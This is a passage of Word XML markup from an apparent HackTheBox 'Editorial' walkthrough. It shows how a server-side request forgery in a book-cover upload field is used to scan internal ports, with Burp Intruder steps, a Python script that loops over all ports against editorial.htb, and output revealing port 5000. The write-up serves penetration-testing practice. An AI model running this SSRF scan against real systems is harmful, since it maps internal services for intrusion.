      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will start by testing port 80 , which is commonly used for HTTP services. By sending a request to http://127.0.0.1:80 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">intercept in Burp Suite and send to repeater</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), we can check if there is a service running on that port, but this only returns a JPEG file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we look at other potentially open ports that are hosting services internally. To do this, we'll use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId945">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">wordlist </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">that contains common HTTP ports along with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite Intruder.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This will automate the process of sending requests to each port listed in the wordlist, allowing us to fuzz through multiple ports quickly and identify which ones might be running web services. To do this in Burp Intruder, under the Positions tab, we highlight the port section in our request and then click on Add § .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDD">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7902264" cy="2444130"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="302" name="image293.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image293.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId946"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7902264" cy="2444130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, in Burp Intruder options, we can load the Common HTTP Ports wordlist into our payload in Burp Suite . We click on the Payloads tab, and under the Payload Settings , we click on Load and then select our wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we also noticed that some responses returned with a .jpeg file extension during our initial test, we can filter the results by grepping for .jpeg . To do this, we navigate to the Settings tab, select Grep - Match , and add the .jpeg extensions. This helps us narrow down our results and focus only on those that return unique responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon finishing, we see that all responses contain a .jpeg file extension. We can now write a Python script to fuzz all open ports (1-65535) and filter out any responses that do not contain a .jpeg extension, as using the free version of Burp Intruder would be slow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9360"/>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2C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777777"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">#!/usr/bin/python3</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">import</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> requests</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">with</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> open(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"a"</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'wb'</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as</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> f:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    f.write(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">b''</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">for</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> port </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> range(1, 65535):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">with</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> open(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"a"</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'rb'</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as</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> file:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        data_post = {</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"bookurl"</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f"http://127.0.0.1:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">{port}</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w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        data_file = {</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"bookfile"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">: file}</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">try</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        r = requests.post(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"http://editorial.htb/upload-cover"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">,</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        files=data_file, data=data_post)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">if</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b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> r.text.strip().endswith(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'.jpeg'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            print(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">f"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">{port}</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> --- </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">{r.text}</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w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">except</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> requests.RequestException </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">as</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> e:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        print(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">f"Error on port </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">{port}</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dd8888"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="dddddd"/>
                <w:shd w:fill="444444" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">{e}</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w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This script uses the requests library to send HTTP requests. It starts by creating an empty binary file named a , which serves as a placeholder for the bookfile in the POST request. The script then loops through all TCP ports from 1 to 65534. For each port, it opens the empty file and prepares the data for the POST request, setting bookurl to the local IP and the current port being tested. The script sends a POST request to http://editorial.htb/upload-cover , including the empty file and the URL data. After sending the request, it checks if the response does not end with a .jpeg extension. If a response is received that does not end with .jpeg , it prints the port number along with the response text. This helps identify ports that return unique content. Now, if we run the script, we see that port 5000 does not have a .jpeg extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE4">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 ssrf2.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE5">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5000 --- static/uploads/85389d97-3812-4851-b49e-1f843f356e45</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now go back to the web page and set that as our web URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1511300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="226" name="image222.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image222.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId947"/>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2CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
